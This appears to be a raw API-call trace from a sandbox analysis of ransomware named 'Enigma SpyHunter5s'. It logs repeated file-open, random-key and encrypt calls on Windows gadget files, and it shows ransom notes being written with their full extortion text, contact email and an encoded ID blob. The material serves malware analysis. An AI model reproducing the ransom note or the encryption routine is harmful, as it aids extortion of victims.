CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.788] GetProcessHeap () returned 0x2c0000 [0160.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.788] GetProcessHeap () returned 0x2c0000 [0160.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee128 | out: hHeap=0x2c0000) returned 1 [0160.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9b8 | out: pbBuffer=0x270e9b8) returned 1 [0160.788] GetProcessHeap () returned 0x2c0000 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9b0*=0x30) returned 1 [0160.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.792] GetProcessHeap () returned 0x2c0000 [0160.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.792] GetProcessHeap () returned 0x2c0000 [0160.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eedad0 | out: hHeap=0x2c0000) returned 1 [0160.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9b0 | out: pbBuffer=0x270e9b0) returned 1 [0160.792] GetProcessHeap () returned 0x2c0000 [0160.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.792] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9a8*=0x30) returned 1 [0160.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.795] GetProcessHeap () returned 0x2c0000 [0160.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.796] GetProcessHeap () returned 0x2c0000 [0160.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed730 | out: hHeap=0x2c0000) returned 1 [0160.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9b0 | out: pbBuffer=0x270e9b0) returned 1 [0160.796] GetProcessHeap () returned 0x2c0000 [0160.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9a8*=0x30) returned 1 [0160.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.799] GetProcessHeap () returned 0x2c0000 [0160.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed390 | out: hHeap=0x2c0000) returned 1 [0160.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9a8 | out: pbBuffer=0x270e9a8) returned 1 [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9a0*=0x30) returned 1 [0160.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eecff0 | out: hHeap=0x2c0000) returned 1 [0160.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9a8 | out: pbBuffer=0x270e9a8) returned 1 [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9a0*=0x30) returned 1 [0160.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.800] GetProcessHeap () returned 0x2c0000 [0160.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.801] GetProcessHeap () returned 0x2c0000 [0160.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eecf08 | out: hHeap=0x2c0000) returned 1 [0160.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9a0 | out: pbBuffer=0x270e9a0) returned 1 [0160.801] GetProcessHeap () returned 0x2c0000 [0160.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.801] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e998*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e998*=0x30) returned 1 [0160.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.801] GetProcessHeap () returned 0x2c0000 [0160.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.801] GetProcessHeap () returned 0x2c0000 [0160.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eece20 | out: hHeap=0x2c0000) returned 1 [0160.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.803] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.803] WriteFile (in: hFile=0x178, lpBuffer=0x270e8d3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x270e8d3*, lpNumberOfBytesWritten=0x270e9fc*=0x127, lpOverlapped=0x0) returned 1 [0160.803] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.804] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e9fc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e9fc*=0x2ac, lpOverlapped=0x0) returned 1 [0160.804] CloseHandle (hObject=0x178) returned 1 [0160.804] GetProcessHeap () returned 0x2c0000 [0160.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e420 | out: hHeap=0x2c0000) returned 1 [0160.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e998 | out: pbBuffer=0x270e998) returned 1 [0160.804] GetProcessHeap () returned 0x2c0000 [0160.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e990*=0x30) returned 1 [0160.804] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)redstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.808] GetProcessHeap () returned 0x2c0000 [0160.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.808] GetProcessHeap () returned 0x2c0000 [0160.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83d88 | out: hHeap=0x2c0000) returned 1 [0160.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e998 | out: pbBuffer=0x270e998) returned 1 [0160.808] GetProcessHeap () returned 0x2c0000 [0160.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e990*=0x30) returned 1 [0160.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.809] GetProcessHeap () returned 0x2c0000 [0160.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.809] GetProcessHeap () returned 0x2c0000 [0160.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eecd38 | out: hHeap=0x2c0000) returned 1 [0160.809] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e990 | out: pbBuffer=0x270e990) returned 1 [0160.809] GetProcessHeap () returned 0x2c0000 [0160.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.809] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e988*=0x30) returned 1 [0160.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.817] GetProcessHeap () returned 0x2c0000 [0160.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.817] GetProcessHeap () returned 0x2c0000 [0160.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eecc50 | out: hHeap=0x2c0000) returned 1 [0160.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e990 | out: pbBuffer=0x270e990) returned 1 [0160.817] GetProcessHeap () returned 0x2c0000 [0160.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e988*=0x30) returned 1 [0160.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)graystateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.822] GetProcessHeap () returned 0x2c0000 [0160.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.822] GetProcessHeap () returned 0x2c0000 [0160.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c837c0 | out: hHeap=0x2c0000) returned 1 [0160.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e988 | out: pbBuffer=0x270e988) returned 1 [0160.822] GetProcessHeap () returned 0x2c0000 [0160.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e980*=0x30) returned 1 [0160.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.823] GetProcessHeap () returned 0x2c0000 [0160.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.823] GetProcessHeap () returned 0x2c0000 [0160.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec8b0 | out: hHeap=0x2c0000) returned 1 [0160.823] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e988 | out: pbBuffer=0x270e988) returned 1 [0160.823] GetProcessHeap () returned 0x2c0000 [0160.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e980*=0x30) returned 1 [0160.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.823] GetProcessHeap () returned 0x2c0000 [0160.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.823] GetProcessHeap () returned 0x2c0000 [0160.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2fd8 | out: hHeap=0x2c0000) returned 1 [0160.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.837] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.837] WriteFile (in: hFile=0x178, lpBuffer=0x270e8b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e9e0, lpOverlapped=0x0 | out: lpBuffer=0x270e8b7*, lpNumberOfBytesWritten=0x270e9e0*=0x127, lpOverlapped=0x0) returned 1 [0160.838] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.838] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e9e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e9e0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.838] CloseHandle (hObject=0x178) returned 1 [0160.838] GetProcessHeap () returned 0x2c0000 [0160.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43b28 | out: hHeap=0x2c0000) returned 1 [0160.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e980 | out: pbBuffer=0x270e980) returned 1 [0160.838] GetProcessHeap () returned 0x2c0000 [0160.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e978*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e978*=0x30) returned 1 [0160.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.840] GetProcessHeap () returned 0x2c0000 [0160.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.840] GetProcessHeap () returned 0x2c0000 [0160.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38780 | out: hHeap=0x2c0000) returned 1 [0160.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e978 | out: pbBuffer=0x270e978) returned 1 [0160.840] GetProcessHeap () returned 0x2c0000 [0160.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e970*=0x30) returned 1 [0160.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\library.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.841] GetProcessHeap () returned 0x2c0000 [0160.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.841] GetProcessHeap () returned 0x2c0000 [0160.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3cb30 | out: hHeap=0x2c0000) returned 1 [0160.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e978 | out: pbBuffer=0x270e978) returned 1 [0160.841] GetProcessHeap () returned 0x2c0000 [0160.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.842] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e970*=0x30) returned 1 [0160.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.842] GetProcessHeap () returned 0x2c0000 [0160.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.842] GetProcessHeap () returned 0x2c0000 [0160.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41148 | out: hHeap=0x2c0000) returned 1 [0160.842] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e970 | out: pbBuffer=0x270e970) returned 1 [0160.843] GetProcessHeap () returned 0x2c0000 [0160.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e968*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e968*=0x30) returned 1 [0160.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.843] GetProcessHeap () returned 0x2c0000 [0160.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.843] GetProcessHeap () returned 0x2c0000 [0160.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ab28 | out: hHeap=0x2c0000) returned 1 [0160.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.844] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.844] WriteFile (in: hFile=0x178, lpBuffer=0x270e8a3*, 